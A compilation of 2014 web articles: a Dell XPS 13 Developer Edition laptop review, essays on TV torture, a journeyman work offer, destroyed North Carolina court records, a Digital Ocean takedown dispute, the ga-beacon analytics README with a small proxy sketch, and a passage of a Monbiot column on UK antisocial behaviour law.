Screen: 13.3 inch, 1920x1080
RAM: 8GB Dual Channel DDR3 SDRAM at 1600MHz
SSD: 256 GB mSATA
GFX: Intel HD 4400

It has two USB 3.0 ports (one on each side), a headphone/headset port and a mini Displayport. That's it (other than the power-port, of course). The lack of an SD card reader is a bit disappointing, but something I can live with.

One thing worth mentioning:
There is a different version of this laptop which comes with an i7-4650U CPU and HD 5000 graphics. Unfortunately, Dell USA only offers this version to corporate customers (through corporate channels). In other countries (like in the UK and France, for instance), you can see this higher-end version on Dell's website and you can order it from there. It's a pity that Dell keeps this version from consumers in the US. I don't understand why they're doing that, but it is what it is.

The laptop comes in a sleek black box, very stylish. The contents are as minimalistic as the box: Laptop, power supply and quick-start manual (for the Windows-version of the machine). The power-supply was a positive surprise: it's very small. Here it is next to the power-supply from a 13inch MacBook Pro:

In the picture above, you can see that the top portion of the black power supply can be taken off and replaced with a cable (which is included in the box) in case you're further away from the wall plug.

The plug which connects to the laptop has white LEDs on it. They light up when the power supply is plugged in to an outlet (regardless of whether or not it's plugged in to the laptop). If the laptop is turned off (or sleeping) and the battery is charging, there's no way for you to tell whether the battery is full or not based on the color of the LED. It stays white. But on the right side of the laptop there is a little button which activates some battery-level-indicator LEDs on the laptop. That will show you the charge level (see below).

First boot: Ubuntu animation, Dell User Agreement, then the standard Ubuntu installer. The WiFi connection worked right away without issues (I'm mentioning this because the Ivy Bridge XPS 13 DE had some significant WiFi connectivity issues). I've had no lag, no disconnects, no hiccups so far (if this changes, I'll update this post). The only thing I noticed is that the WiFi-signal indicator at the top right of the screen shows 3 out of 4 bars. The router is only 3 or 4 meters away from the laptop, so this is weird. All other devices in my household show full bars when they're in the same room as the router. My experience has been fine, though. A speedtest showed normal results, I ran some FTP-transfers, downloads, SSH connections, all worked just fine.

The keyboard's backlight is on by default and can be switched on and off via Fn + F6. There doesn't seem to be a regulator for the brightness of the backlight, but that's not a problem for me. The keyboard itself is very nice to type on. Compared to a 13inch MacBook Pro, which I have here next to me, I'd say the keys of the XPS 13 feel a bit "stiffer", meaning it requires a little more force to push a key down than on the MBP. It is by no means hard to press a key, though, don't get me wrong. I like this "stiffness" and it makes for a comfortable typing-experience. For those familiar with the different Cherry MX-switches in mechanical keyboards, I'd say that the MBP keyboard compares to a MX-red and the XPS 13 keyboard compares to a MX-black (when I say "compares", I mean "veeeery loosely compares". It's just the best description I could come up with to give you an idea). After having used the XPS 13 for a few days and then going back to the MBP, I like the XPS's keyboard better.

Screen brightness control: Worked right away without a hitch (via Fn + F4 / F5). I'm fine with one of the lower screen brightness levels most of the time. The lowest brightness setting on the MacBook Pro (which is too dark for me to use) is definitely darker than on the XPS 13. The lowest setting on the Dell works just fine for me and it will probably save me some battery as well. One thing I noticed was that the screen brightness sometimes resets itself to the default brightness after rebooting or waking up from suspend. (In that case, I simply have to set it back down. No biggie, but I wanted to mention it.)

Screen: I was a little worried that 1920x1080 would be a bit of a problem for me on a 13inch screen. But it isn't too small at all for me, I like it. The display quality looks fantastic, very crisp and the viewing angles are awesome. Going back to a 13inch MBP after a week with the XPS feels like things are very cramped on the MBP. The screen on the XPS simply offers more real estate.
As I'm writing this I'm realizing I should probably say something about the touch-functionality of the screen. I'm not really interested in this feature and I will most likely not use it at all. But it's there. I touch-clicked around a little bit just now and it seems to work.

Battery life: I find this one a bit hard to judge and give a number that will hold true for everybody, since everybody's usage patterns are different. But after having used the XPS for a full week now, here's how it's been for me: Great.
I get about 6 hours of usage from a full charge (or more if I leave my desk for breaks and the screen shuts off after 5 minutes, which saves battery). As I mentioned earlier, that's usually on the lowest (or second to lowest) screen brightness setting, with the keyboard backlight enabled for about 50-75% of the time, and having Firefox open with 5-10 tabs, sometimes YouTube running in the background for some music, some Terminal windows open, Steam open in the background, Skype running in the background and a few text editor windows open.
Running games will of course reduce the battery-time. For example, if I start up "Starbound" when the battery is full, the indicator tells me I have about 3 to 3:30 h left. It's about the same when I start a Skype-video-call with a full battery.

Touchpad: It has a nice soft-feel to it and I've been able to use it without issues so far. I like to tap-click as opposed to actually clicking down the physical button. This works fine, as well as two-finger-tapping for a right-click. Two-finger-scrolling works fine as well. (If one prefers to click down the physical button: this works perfectly fine as well, for both left and right clicks)
I noticed one thing which doesn't matter at all to me, but maybe it matters to some: Getting a right-click by one-finger-tapping (not clicking) on the pad requires you to tap at the very very very lower right corner of the pad, which I find impossible to get right on the first try. So much so that I'm actually wondering whether this is done on purpose to avoid accidental right-click-taps.

Default partitioning:

(At the point I took this screenshot all I had done were the system updates and the installation of Chrome)

What did I configure / install so far?
- Set up automatic TRIM for the SSD via daily cron-job (used this tutorial for "Scheduled TRIM")
- Ran all system updates for Ubuntu 12.04 LTS
- Chrome
- Firefox
- Steam and several games (through Steam)
- Dropbox
- SpiderOak
- Some indicators (for CPU/network activity and CPU temperature)
- Skype
- KeePassX
- TrueCrypt

I'll install OpenShot and Blender in the next few days and play around with those.

Below are a few shots of the XPS next to a late 2013 retina MacBook Pro 13inch.

Temperature and noise: While surfing / writing / YouTube-ing / terminal-ing I felt the laptop getting warm towards the center/top of the keyboard. The fan kicked in very rarely. When it did, it didn't stay on for long and the noise was okay. When the fan is off, the machine is absolutely silent. I installed a temperature indicator and while idle, the CPU temp is about 50 degrees Celsius. (I originally wrote that it's 53 degrees, but that's wrong. I just checked it again and I must have had it wrong in my notes. It's definitely 49-50.)

A few scenarios:

- YouTube running on a background tab in Firefox while typing this review in another tab, Skype running, Terminal running, Text Editor running
CPU load is between 10 and 20 % and the temperature is 60 degrees Celsius. Fan is off (or at least inaudible)

- Same scenario as before, without YouTube, but with Starbound running through Steam
CPU load is about 36% and the temperature is about 72 degrees Celsius. Fan is on and audible, but rather low. Having the game's sound on (normal level) is louder than the fan-noise.

- To bring the CPU load up, I installed "pi" (sudo apt-get install pi) and ran instances of it in terminals by entering "pi 200000000". Each time, I let it run for about 2 minutes before writing down the result.

2 instances of pi: approx. 54% CPU, 65 degrees C, fan kicked in audibly at first, but then went to a lower level (it's still on, but I have to bring my ear very close to the laptop to actually hear it).

3 instances of pi: approx. 78% CPU, 68-69 degrees C, same fan behaviour as the previous test

4 instances of pi: approx. 100% CPU, 68-69 degrees C, same fan behaviour as the previous test

Build-quality / finish: I find it great. The top of the lid is aluminium and the bottom is carbon fiber, as pictured below. Nothing is wiggling, rattling or bending.

I had noticed beforehand that the headphone port was listed as "headset port". So I was wondering if that meant headphones with an integrated microphone (such as wired headsets for cellphones) would work. Answer: Yes, they do. I plugged in an iPhone wired headset and the mic works, plug and play, no fiddling required.

Overall, this little laptop has a high quality feel to it and everything I tried worked. I'd say my experience was similar to that of a MacBook Pro. I really like the overall concept of the XPS 13 DE. It's minimalistic, yet powerful, but kind of off the mainstream. And this concept shines through from A to Z: From the packaging, the hardware, the software and the overall experience.

Getting things done in Ubuntu has been painless. Before this, I was using Windows 7 and OSX. I wasn't unhappy with those, but I really liked the concept behind "Project Sputnik". I'm willing to put a little effort into making things work, but I already have a day-job and so I'm not looking for a laptop that will require a few hours every day just to get things to work the way I expect. I want to *use* it, I don't want to have to put work into *making it useful*. And that's what this device does: It works.

For now (after a week of usage), I'm very happy with my purchase and would absolutely recommend this laptop to anybody looking for a solid, painless Ubuntu experience on a very nice laptop where things just work out of the box.

I'll update this post if anything arises.


The Rise and Rise of Television Torture :: Interpret This


Comments:"The Rise and Rise of Television Torture :: Interpret This"

URL:http://www.interpretthis.org/2014/01/05/the-rise-and-rise-of-television-torture


The X-Files was a reflection of its time. It ran from 1993 - 2002. Two FBI agents working on weird and unusual cases. The X-files. It also had an overall plot line that was slowly advanced in between "monster of the week" episodes. The central plot concerned an overarching conspiracy. A powerful cabal who were collaborating with alien colonisers.

It was thoughtful and often slowly paced. The central characters were in search of truth while everyone around them tried to obscure it.

Fringe is a modern reincarnation of the X-Files. A special division of the FBI is responsible for working on "fringe" cases. The show uses the same "monster of the week" format with an overarching arc (though the monsters are often more tightly integrated into the arc itself) and the protagonists are slightly odd outsiders.

However one major difference that jumps out when you compare them is the huge amount of torture that happens in Fringe compared to the X-Files.

Torture is depicted as a tool. Sure it’s a big hammer. And maybe not appropriate to be used for every nail. But if you need to use it then of course it’s appropriate. Why wouldn’t you pull that tool out if you needed it? In fact it’s often portrayed as a moral failing not to do whatever it takes to get the results you need.

Torture is used by all parties. Everyone resorts to torture, whether they are the good guys or the bad guys. Because torture is not seen as objectively bad. It is a technique for winning.

Scully and Mulder from the X-Files did not go around torturing people. And neither were they (at least not very often) tortured themselves.

But this prevalence of torture that you see in otherwise very comparable shows is not limited to Fringe. It is everywhere in American entertainment now.

Everywhere you see it, it promotes the lie that torture works. It does this very effectively, because usually we, the audience, already know that the person being tortured has the information. They just will not give it up. In real life, of course, torture is not like that. In the hundreds of torture scenes that have been acted out in popular media only a handful show the victim making things up and saying whatever they think the torturer wants to hear in order to make the torture stop. Which is the reason why torture is not a useful tool. The process would be: torture someone, they tell you something, you double check that story, maybe torture the people they implicate, then you find out that their story was incorrect, and go back to torturing them. Just one round of that might take days or weeks. Which would make for boring TV.

On television, national security or law enforcement is presented as an ongoing series of life-or-death situations where some wrongdoer is withholding information that will save many lives if it is just somehow extracted. Somehow. Right now. There is no time to think or make rational decisions.

You cannot help but link this increase to the changed attitudes towards torture in American politics. Torture has been legitimized as the only way to prevent a terrorist attack that is going to happen any minute now. When really it seems to be used to extract confessions and encourage people to give someone, anyone, else up.

Missing from the televised depictions of torture are all the other reasons why individuals or states might torture someone. Torture is used for diverse reasons (punishment, revenge, political re-education, sadistic gratification, deterrence, coercion of the victim or a third party) and to show it used for a single purpose only is very misleading.

Fringe, like many other shows (Scandal OMG), is part of the normalisation of torture. When you start actively watching out for it the prevalence of these scenes is shocking.

Not shocking just because they are uncomfortable to watch, but shocking because they are re-educating and changing attitudes towards this act. Conveniently at a time when governments have also redefined torture as something appropriate.

Other Sources

New Yorker article on the presentation of torture in Scandal
Taylor Marsh arguing that Scandal is actually progressive
Lengthy discussion thread over on Hacker News

Hansel - 05/01/2014


Will Work For Food And Lodging - Jacques Mattheij


Comments:"Will Work For Food And Lodging - Jacques Mattheij"

URL:http://www.jacquesmattheij.com/will-work-for-food-and-lodging


In the past, the various professions were organized as guilds. If you wanted to become a cabinetmaker you’d enter into an apprenticeship arrangement with a ‘master’ cabinetmaker and you’d be taught the tricks of the trade over a period of several years. As your final examination you would be required to make a masterpiece (that’s where that word comes from) and then, if the master accepted your work, you could call yourself a cabinetmaker. To keep you from setting up shop right next door and cannibalizing the person who taught you, and to promote the flow of ideas within the guild, you would then be discharged from your apprenticeship and your journeyman years would start.

The journeyman years are an interesting concept. The newly minted cabinetmaker (or bricklayer, wheelwright, smith, whatever) would don travelling clothes (including a walking stick), pack up his tools and a knapsack and hit the road, travelling from town to town offering his services, telling stories, and being given food and a roof over his head at night. This period would last from 1 to 3 years, and upon completion the former apprentice, now journeyman, would be permitted to settle in a spot that the guild had some say in and would be allowed to call himself a master.

As technology became more and more widespread the power of the guilds diminished and trade crafts died out. In some isolated pockets of the world the journeyman concept still exists but it is really an anachronism. For instance, in Germany the carpenter trade still practices (a limited form of) the journeyman years and occasionally you can see them walking the roads or the streets there.

So, besides wishing all the readers of this blog a very happy 2014 I have an offer to make. I’ll divide 2014 into 13 equal portions of 4 weeks each. Twelve of those, starting the 1st of February, will have one half dedicated to the things that I normally do to make a living (maintain my websites, consultancy, technical due diligence). The other half I will give away to parties within 1,000 km from my base (Amsterdam) who think they have an interesting job for me to do. There will be no payment for this and I’ll pay for my own fuel for my trusty bus; in the journeyman’s tradition, though, I would expect food and lodging. Though each part will be limited to two weeks, there is no reason why there could not be several geographically close parties that each want me for a shorter period, so feel free to request shorter things as well.

So, if you want to take me up on this offer, mail me at j@ww.com with who you are, what you (or your company) want me to do, where you are located, and any specific time-frame or other conditions you should probably tell me about too. Every 4-week period I will select one or more of the open offers and we’ll arrange for a specific date & time to visit and work on your project.

Don’t feel too limited about the kind of work that you have, I’m pretty versatile. If any tools are required for whatever you want to do and I have them (and you don’t) then I could probably bring them with me (the bus will hold about 5 cubic meters worth of stuff); however, if I don’t have the tools required then I won’t be buying them. If any materials are required then that’s your problem, and of course I would expect you to be available during the time that we agree I’ll be ‘on site’. Naturally, I reserve the right to write about my experiences on the road as well as with you / your company, suitably anonymized.

A request does not automatically constitute an obligation on my part to accept; I will evaluate the offers on a case-by-case basis and will select those that are, in my opinion and solely at my discretion, the best fit.

If you want to get an idea of what I can do, the rest of this blog might give you some hand-holds. I’m not limiting this offer any more than I have to, so feel free to ask me to help remodel your house, but chances are that there will be something a bit more aligned with my skills. On the other hand, if yours is the only request and it is to help remodel your house I will probably take it :)

Some stuff I’ve done over the years: ran a mid-sized company (25 employees), designed a windmill, wrote the software to help design it, built the plasma cutter/mill and associated electronics that it was made on, CAD/CAM software, car restoration, house rebuilding and house building, electronics design, general programming, web programming (but that’s not up to 2014 standards), general problem solving (the more difficult, the bigger the chance that I’ll like the challenge :) ) and so on.

I really try to live up to my favorite line from Robert A. Heinlein’s books: “A human being should be able to change a diaper, plan an invasion, butcher a hog, conn a ship, design a building, write a sonnet, balance accounts, build a wall, set a bone, comfort the dying, take orders, give orders, cooperate, act alone, solve equations, analyze a new problem, pitch manure, program a computer, cook a tasty meal, fight efficiently, die gallantly. Specialization is for insects.”

So feel free to challenge me in unexpected ways.


160 year-old Documents Intentionally Destroyed in Franklin County, N.C. | Stumbling in the Shadows of Giants


Comments:"160 year-old Documents Intentionally Destroyed in Franklin County, N.C. | Stumbling in the Shadows of Giants"

URL:http://stumblingintheshadowsofgiants.wordpress.com/2013/12/21/160-year-old-documents-intentionally-destroyed-in-franklin-county-n-c/


This is one of a countless number of 19th century records seized by the North Carolina Archives and burned on December 6, 2013

I rarely re-blog, but this one deserves being spread far and wide.

Timeline of the Destruction of 100 Year Old Franklin County, NC Records

Please read the whole post included above – but the gist is as follows:

- This summer a new Clerk of Court in Franklin County discovered a trove (an entire roomful) of documents, some dating back to 1840, in a previously sealed room in the Franklin County, North Carolina Court House.

- Recognizing the historical value of these materials, she contacted the local historical society to assist in reviewing the materials, preserving them, and inventorying the materials.

- The local historical group enthusiastically poured itself into the project, mobilizing volunteers and the whole community – securing work space, materials, and finances – in order to catalog and preserve the bounty of record books, photographs, deeds, chattel records, land grants, wills, personal correspondence, and countless other materials from a wide variety of government departments throughout the county. (This room had apparently become the “graveyard” for old records, and no one had bothered to investigate it for many, many decades.)

- In August of this year the local historians – realizing they might be beyond their depth in regard to the value of some of these materials – contacted the North Carolina Department of Archives, seeking guidance on proper preservation techniques and value assessment.

And that’s when things went hinky. The NC Archives group stepped in, pulled rank, and immediately halted all work on the project, stating that they were going to study the challenge and come up with “Next Steps”. Months passed and nothing got done, while the documents languished in the basement of the courthouse.

Then, on Friday, December 6, 2013, at 6:00 in the evening (after all the county workers had left, and with no notice to the local historical group involved in the project), a team from the North Carolina Archives swept in and confiscated ALL the materials – under the cover of Law Enforcement! They took the documents to the County Incinerator and methodically burned EVERYTHING. They did this while a few locals stood by, not understanding why or precisely what was happening.

[CORRECTION: Added 01/06/2014 - The folks who swept in to claim and destroy the documents were NOT from the NC Archives. A team from the NC Archives did seize many boxes of documents from a workroom managed by the Franklin County Historical Society - but they were NOT directly involved in the destruction of the materials in the basement.

ADDENDUM TO THE CORRECTION: Added 01/06/2014 - A number of people have posted/emailed asking if I know what County Agency was responsible. I do not know for certain. So far conjecture leads me to the Franklin County Manager's office - but until I hear her side of the story - my opinion is uninformed except by silence. Sorry.]

Every book, deed, will – every photograph – every piece of paper in that room was incinerated that night. No explanation has been given, and no media outlet has asked any questions.

Boxes of documents from the Franklin County Courthouse seized and burned by the North Carolina State Archives.

HERE’S WHAT I THINK:
After the Civil War (after emancipation), a lot of large land-owners deeded out substantial tracts of land to their former slaves. These former slaves had demonstrated to their masters that they were loyal, hard-working, and would continue to farm and contribute to the plantation collective as they always had. The only difference is that they would own the land they worked, and earn a somewhat larger income as a result of their efforts.

During reconstruction, a lot of land holders, both black and white, had difficulty paying very high property taxes imposed by Federal Occupiers. In swept speculators and investors from up North (these people have come to be known as “Carpet Baggers”.) They often forced white land owners to sell out at a fraction of the actual value of their property. In the case of black land-owners, sometimes all the Carpet Baggers offered was threats. The effect was the same – a vast transfer of wealth from titled property owners to new people who became, in the decades of the late 19th and early 20th century, among the wealthiest people in the South.

How do I know this? Some of my own ancestors were Carpet Baggers from Maryland. They made a small fortune after the war, stealing land, setting up mills, and effectively re-enslaving two or three generations of both poor-white and black natives of Halifax County, North Carolina.

My suspicion is that in and amongst all those now destroyed records, was a paper trail associated with one or more now-prominent, politically connected NC families that found its wealth and success through theft, intimidation, and outrageous corruption.

Prove me wrong. You can’t. They destroyed the records.

Shelves of record books from the Franklin County Courthouse seized and burned in December, 2013.



Digital Ocean said it would shut down my blog if I didn’t remove or edit a blog post. | vpsexperience


Comments:"Digital Ocean said it would shut down my blog if I didn’t remove or edit a blog post. | vpsexperience"

URL:http://vpsexperience.wordpress.com/2014/01/05/digital-ocean-threatened-to-shut-down-my-blog-if-i-didnt-remove-or-edit-a-blog-post/


This is a story about how the VPS provider Digital Ocean required me to either delete a blog post or make it anonymous by removing any reference to the person I was writing about. If I refused to do it, Digital Ocean said they would terminate my account. The person I wrote about in the blog post (Googler Travis Collins) happened to be a friend of a Digital Ocean executive, but Digital Ocean said the only reason the blog post needed to be removed was a terms of service violation. Here’s the blog post in its original form. I describe below how this whole incident came to pass and provide screenshots of Digital Ocean’s communications. Digital Ocean promotes itself as a great place to set up a blog, and they provide instructions to make it easy for you, but you might want to learn how Digital Ocean applies its terms of service before investing a lot of time in writing blog posts.

A couple of weeks ago I decided to set up a WordPress blog on a VPS provided by Digital Ocean. I didn’t have specific plans to write about anything in particular, but since I’m trying to retrain as a developer there would probably be a tech angle to most of what I published. One potential story idea arose when I was hanging out on another site hosted on and sponsored by Digital Ocean, Chat Meatspace. Chat Meatspace is one of Digital Ocean’s so-called #TopDrops. It’s a site where a lot of “alpha geeks” hang out (as TechCrunch describes them), including several high-profile members of the JavaScript community, the Chief Technology Evangelist for Digital Ocean, and at least two Googlers that I knew of, one being a guy named Travis Collins. It’s a very small community and the people are all chummy with each other.

One day, as I was lurking on Meatspace, I saw the Googler Travis Collins turn up and decided to ask his opinion about a story that Gawker had published about how Google treats its contract employees. I gave him the link to the story and he provided some very candid responses, which I took screenshots of and used to write up this blog post. Travis had no idea that I intended to write up a blog post, and, indeed, I had no real plans to write one until Travis gave me his response, which I thought was somewhat newsworthy since he works for the company that was the subject of the other story. After he gave me his responses, he decided to mute me on the site, so it was impossible to communicate with him and let him know that a blog post was going to be published. My act of taking his statements and publishing them is the same as what anyone does when they quote something someone says on Twitter. It’s fair game to republish something in the public domain.

Several days later, after TechCrunch published its story about Meatspace, the Meatspace community discovered my blog post via a comment on TechCrunch and were really angry about it. I happened to be lurking on Meatspace as they were discussing it and took screenshots of things they said about it and me. One member of the community half-seriously (I assumed) threatened to harm me, proposing to “Godwins law this fucker” (screenshot) – a reference to the practice of accusing someone of being a Nazi sympathizer in internet discussions (see the Wikipedia entry here). Another member of the community, who was present and very suspicious as I asked Travis Collins the questions about the Gawker story, had taken note of my browser “fingerprint” and was now offering to share it with everyone (fingerprint screenshot).

Interestingly, when the Meatspace community asked Travis Collins about the blog post, he said he didn’t care. “Meh, whatever,” were his words. Here’s a screenshot of the question being asked and here’s a screenshot of Travis Collins’ response.

The next day, however, I received notification from Digital Ocean about an abuse complaint, which purportedly came from Travis Collins. The complaint claimed that I had been harassing Travis Collins online and the blog post was part of that larger pattern of harassment. Here’s the complaint.

The most outrageous part of this abuse complaint is that it claimed that I had been harassing and following Travis Collins around online. This is easily proven false because Travis Collins admitted that he had no idea who I was as I spoke to him on Meatspace. Here’s a screenshot of Travis Collins admitting that he had no idea who I was as I spoke to him on Meatspace.
I pointed this fact out to Digital Ocean but they just ignored it, even when I also showed them that other members of the Meatspace community expressed an interest in harming my reputation (i.e. Godwins law this fucker).

Anyway, when signing up for Digital Ocean, my assumption was that if a person had a complaint about content, the VPS provider would ask them to contact the publisher (me) rather than trying to mediate between the person with the complaint and the publisher itself. I asked Digital Ocean to have Travis Collins contact me and they just ignored it.

When I asked Digital Ocean how my blog post violated the terms of service, they quoted one clause from the ToS but didn’t explain how my content violated it.

In reply, I pointed out to Digital Ocean that Travis Collins didn’t actually care about the blog post and I provided the screenshot of Travis Collins’ response to prove it.

Second, I also pointed out how the complaint contained a lie. How was it possible that I had been harassing and following Travis Collins around online if it was also true, as Travis admitted, that he had no idea who I was?

I therefore suggested to Digital Ocean that Travis Collins wasn’t telling the truth about being embarrassed, or that the person who made the complaint wasn’t actually Travis Collins but one of the other Meatspacers who expressed an interest in harming me. I gave them the screenshots of the Meatspace users talking about defaming me with Godwins law.

Digital Ocean didn’t listen to anything I said. They required me to either remove the blog post entirely or to make it “anonymous.” They said that my story was “targeting” Travis Collins and that I could easily remove any reference to Travis Collins and still make the same point. In fact they said that my unwillingness to make the blog post anonymous lent credibility to Travis’ complaint, which ignored the fact that it likely wasn’t even Travis who made the complaint. Digital Ocean required me to provide legal documentation to show that I could publish the blog post. They said they would gladly respond to an injunction from a New York court! This was obviously very difficult for me to do since I’m not even in the United States!

Digital Ocean promotes itself as a great place to setup a WordPress or Ghost blog, and they provide very clear instructions how to do it, but you should carefully consider their terms of service and the content you plan on publishing, or you might end up wasting a lot of your time and their time.

By the way, I sent an email to Travis Collins and asked him if he made the complaint and he never replied!

If you’re really interested, here’s the whole series of communications.

First. The complaint

My initial response with their reply quoting the terms of service

I object that they haven’t explained how I violated the terms of service, and also point out that Travis didn’t even care about the post

their response

I initially refuse and point out how the Meatspace community said it was going to harm me

I provide them more info on Godwins law

I pointed out how the person claiming to be Travis lied about me harassing him

they respond by saying it was clearly a ToS violation and provide me two options, to make the post anonymous or remove it

I offer to remove the words “obnoxious” and “bratty” from my post and re-iterate several points they didn’t respond to

I show them why it’s likely that Travis didn’t even make the complaint

They tell me I must comply

After I pointed out again that it likely wasn’t even Travis who made the complaint, they respond by claiming the complaint had merit and they’d take action on my account if I didn’t comply with their demands

I ask them to clarify what action on my account means, and they tell me my droplet would be powered down and my account locked down

They explain that locked down means ‘terminated’


igrigorik/ga-beacon · GitHub


Comments:"igrigorik/ga-beacon · GitHub"

URL:https://github.com/igrigorik/ga-beacon


Google Analytics for GitHub

Curious which of your GitHub projects are getting all the traffic, or if anyone is reading your GitHub wiki pages? Well, that's what Google Analytics is for! GitHub does not allow us to install arbitrary analytics, but we can still use a simple tracking image to log visits in real time to Google Analytics - for full details, follow the instructions below. Once everything is set up, install this custom dashboard in your account for a nice real-time overview (as shown in the screenshot above).

Note: GitHub finally released traffic analytics on Jan 7, 2014 -- wohoo! As a result, you can get most of the important insights by simply using that. If you still want real-time analytics, or an integration with your existing GA analytics, then you can use both the tracking pixel and built-in analytics.

Setup instructions

First, log in to your Google Analytics account and set up a new property:

  • Select "Website", use new "Universal Analytics" tracking
  • Website name: anything you want (e.g. GitHub projects)
  • WebSite URL: https://ga-beacon.appspot.com/
  • Click "Get Tracking ID", copy the UA-XXXXX-X ID on next page

Next, add a tracking image to the pages you want to track:

  • https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name
  • UA-XXXXX-X should be your tracking ID
  • your-repo/page-name is an arbitrary path. For best results specify the repository name and the page name - e.g. if you have multiple READMEs or wiki pages you can use different paths to map them to the same repo: your-repo/readme, your-repo/other-page, and so on!

Example tracker markup if you are using Markdown:

[![Analytics](https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name)](https://github.com/igrigorik/ga-beacon)

Or RDoc:

{<img src="https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name" />}[https://github.com/igrigorik/ga-beacon]

If you prefer, you can skip the badge and use a transparent pixel. To do so, simply append ?pixel to the image URL.

And that's it, add the tracker image to the pages you want to track and then head to your Google Analytics account to see real-time and aggregated visit analytics for your projects!

FAQ

  • How does this work? GitHub does not allow arbitrary JavaScript to run on its pages. As a result, we can't use standard analytics snippets to track visitors and pageviews. However, Google Analytics provides a measurement protocol which allows us to POST the visit data directly to Google servers, and that's exactly what GA Beacon does: we include an image request on our pages which hits the GA Beacon service, and GA Beacon POSTs the visit to Google Analytics to record it.

  • Why do we need to proxy? Google Analytics supports reporting of visit data via GET requests, but unfortunately we can't use that directly because we need to generate and report a unique visitor ID for each hit - GitHub does not allow us to run JS on the client to generate the ID. To address this, we proxy the request through ga-beacon.appspot.com, which in turn is responsible for generating the unique visitor ID (a server-generated UUID) and reporting the hit to Google Analytics. (A minimal sketch of this flow follows the FAQ below.)

  • What about referrals and other visitor information? Unfortunately the static tracking pixel approach limits the information we can collect about the visit. For example, referral information is only available on the GitHub page itself and can't be passed to the tracking pixel. As a result, the available metrics are restricted to unique visitors, pageviews, and the User-Agent of the visitor.

  • Can I use this outside of GitHub? Yep, you certainly can. It's a generic beacon service.
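
Purely as an illustration of the flow described in the FAQ above, here is a rough JavaScript (Node) sketch. This is my own sketch, not the project's actual code (the real service runs on App Engine); it only mirrors the idea of answering the image request with a pixel while reporting the hit to the Measurement Protocol's /collect endpoint.

// Minimal GA Beacon-style proxy sketch. Assumed behaviour, not the real ga-beacon code.
const http = require('http');
const https = require('https');
const crypto = require('crypto');
const querystring = require('querystring');

// 1x1 transparent GIF served back to the page instead of the badge.
const PIXEL = Buffer.from('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7', 'base64');

http.createServer((req, res) => {
  // Expected path layout from the README: /UA-XXXXX-X/your-repo/page-name
  const [, tid, ...page] = req.url.split('?')[0].split('/');

  // Report the pageview to the Google Analytics Measurement Protocol.
  const hit = querystring.stringify({
    v: 1,                        // protocol version
    tid,                         // tracking ID taken from the URL
    cid: crypto.randomUUID(),    // server-generated visitor ID (Node 15+); no client JS is available
    t: 'pageview',
    dp: '/' + page.join('/'),    // e.g. /your-repo/page-name
  });
  https.request('https://www.google-analytics.com/collect', { method: 'POST' })
       .on('error', () => {})    // ignore reporting failures; the page should still render
       .end(hit);

  // Respond with the pixel so the image request completes normally.
  res.writeHead(200, { 'Content-Type': 'image/gif', 'Cache-Control': 'no-cache' });
  res.end(PIXEL);
}).listen(8080);

The sketch only captures the core request/report/respond cycle described in the FAQ; details such as badge rendering and caching are left out.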


At last, a law to stop almost anyone from doing almost anything | George Monbiot | Comment is free | The Guardian


Comments:" At last, a law to stop almost anyone from doing almost anything | George Monbiot | Comment is free | The Guardian "

URL:http://www.theguardian.com/commentisfree/2014/jan/06/law-to-stop-eveyone-everything


Until the late 19th century much of our city space was owned by private landlords. Squares were gated, streets were controlled by turnpikes. The great unwashed, many of whom had been expelled from the countryside by acts of enclosure, were also excluded from desirable parts of town.

Social reformers and democratic movements tore down the barriers, and public space became a right, not a privilege. But social exclusion follows inequality as night follows day, and now, with little public debate, our city centres are again being privatised or semi-privatised. They are being turned by the companies that run them into soulless, cheerless, pasteurised piazzas, in which plastic policemen harry anyone loitering without intent to shop.

Street life in these places is reduced to a trance-world of consumerism, of conformity and atomisation in which nothing unpredictable or disconcerting happens, a world made safe for selling mountains of pointless junk to tranquillised shoppers. Spontaneous gatherings of any other kind – unruly, exuberant, open-ended, oppositional – are banned. Young, homeless and eccentric people are, in the eyes of those upholding this dead-eyed, sanitised version of public order, guilty until proven innocent.

Now this dreary ethos is creeping into places that are not, ostensibly, owned or controlled by corporations. It is enforced less by gates and barriers (though plenty of these are reappearing) than by legal instruments, used to exclude or control the ever widening class of undesirables.

The existing rules are bad enough. Introduced by the 1998 Crime and Disorder Act, antisocial behaviour orders (asbos) have criminalised an apparently endless range of activities, subjecting thousands – mostly young and poor – to bespoke laws. They have been used to enforce a kind of caste prohibition: personalised rules which prevent the untouchables from intruding into the lives of others.

You get an asbo for behaving in a manner deemed by a magistrate as likely to cause harassment, alarm or distress to other people. Under this injunction, the proscribed behaviour becomes a criminal offence. Asbos have been granted which forbid the carrying of condoms by a prostitute, homeless alcoholics from possessing alcohol in a public place, a soup kitchen from giving food to the poor, a young man from walking down any road other than his own, children from playing football in the street. They were used to ban peaceful protests against the Olympic clearances.

Inevitably, more than half the people subject to asbos break them. As Liberty says, these injunctions "set the young, vulnerable or mentally ill up to fail", and fast-track them into the criminal justice system. They allow the courts to imprison people for offences which are not otherwise imprisonable. One homeless young man was sentenced to five years in jail for begging: an offence for which no custodial sentence exists. Asbos permit the police and courts to create their own laws and their own penal codes.

All this is about to get much worse. On Wednesday the Antisocial Behaviour, Crime and Policing Bill reaches its report stage (close to the end of the process) in the House of Lords. It is remarkable how little fuss has been made about it, and how little we know of what is about to hit us.

The bill would permit injunctions against anyone of 10 or older who "has engaged or threatens to engage in conduct capable of causing nuisance or annoyance to any person". It would replace asbos with ipnas (injunctions to prevent nuisance and annoyance), which would not only forbid certain forms of behaviour, but also force the recipient to discharge positive obligations. In other words, they can impose a kind of community service order on people who have committed no crime, which could, the law proposes, remain in force for the rest of their lives.

The bill also introduces public space protection orders, which can prevent either everybody or particular kinds of people from doing certain things in certain places. It creates new dispersal powers, which can be used by the police to exclude people from an area (there is no size limit), whether or not they have done anything wrong.

While, as a result of a successful legal challenge, asbos can be granted only if a court is satisfied beyond reasonable doubt that antisocial behaviour took place, ipnas can be granted on the balance of probabilities. Breaching them will not be classed as a criminal offence, but can still carry a custodial sentence: without committing a crime, you can be imprisoned for up to two years. Children, who cannot currently be detained for contempt of court, will be subject to an inspiring new range of punishments for breaking an ipna, including three months in a young offenders' centre.

